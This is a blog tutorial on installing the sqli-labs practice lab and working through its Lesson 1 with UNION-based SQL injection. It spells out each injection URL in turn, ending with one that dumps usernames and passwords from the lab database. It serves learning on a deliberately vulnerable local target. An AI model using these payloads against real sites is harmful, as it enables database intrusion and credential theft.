sqli-labs: learning SQL injection

sqli-labs Installation and Configuration

Download sqli-labs and phpStudy. Note that the phpStudy version must not be newer than 8.0, or errors occur; I had a newer phpStudy version installed and got errors. (sqli-labs is written against the old mysql_* PHP extension, which was removed in PHP 7, so the PHP version you select in phpStudy should also be a 5.x release.)
After the download finishes, extract sqli-labs into phpStudy's WWW folder.
Open sqli-labs-master\sql-connections; it contains a db-creds.inc file. Open it and edit it.
The default user name and password are usually both root; if you changed them, enter the values you changed them to. Then open http://localhost/sqli-labs-master in the browser.
Click Setup/reset Database for labs.
Seeing the setup output in the page means it succeeded.

Union query injection method

Some things to remember when doing SQL injection:
information_schema holds metadata about every database on the server.
information_schema.columns lists the columns of every table.
table_name: table name
table_schema: database name
column_name: column name
information_schema.tables lists the tables of every database.
group_concat() joins the values from many rows into a single string, so a whole result set fits into one display position.

Principle of union query injection
The prerequisite for union query injection is a display position: a place where content returned from the database by the query is shown on the page.
Since I am a newcomer, I will use sqli-labs Lesson 1 as the example here.
Open the site and enter Lesson 1.
1. Determine the injection point
The closing character is usually ' or " (sometimes wrapped in a parenthesis, giving ') or ")), or there is none at all; the comment sequence is usually --+ (in the URL the + decodes to a space, which MySQL requires after --; # also works, URL-encoded as %23).
Enter ?id=1' in the address bar and the page shows an error.
After appending the comment --+ the page returns to normal.
This shows that the injection point is closed with a single quote '.
2. Determine the number of columns
Entering id=1, id=2 and id=3 returns different data each time. Then enter

http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+

and the page shows an error (Unknown column '4' in 'order clause'), while order by 3 still returns normally.
This shows there are three columns in total.
3. Begin the union query
Enter

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,2,3 --+

Here id is set to a value that does not exist in the database, so the original SELECT returns no row and the union query shows where the injected data is displayed.
The result shows the values 2 and 3 on the page, so positions 2 and 3 are where we can put the expressions we want to see.
Dumping the database name
Use the database() function to see the current database:

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,database(),3 --+

The page displays security as the current database.
Dumping the table names
This is where the statements listed earlier come in. To dump table names, apply group_concat() to table_name and specify a source: information_schema.tables, restricted with table_schema to the database name dumped above.

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

Dumping the column names

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

The catalog table is information_schema.columns (plural), and the table whose columns we want is selected with table_name='users'; table_schema restricts the lookup to the security database, since another database may contain a table with the same name.
Dumping the values

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+

0x3a is the ASCII colon, so each row is displayed as username:password. This way the values are dumped!


Source: blog.csdn.net/qq_46041723/article/details/104498282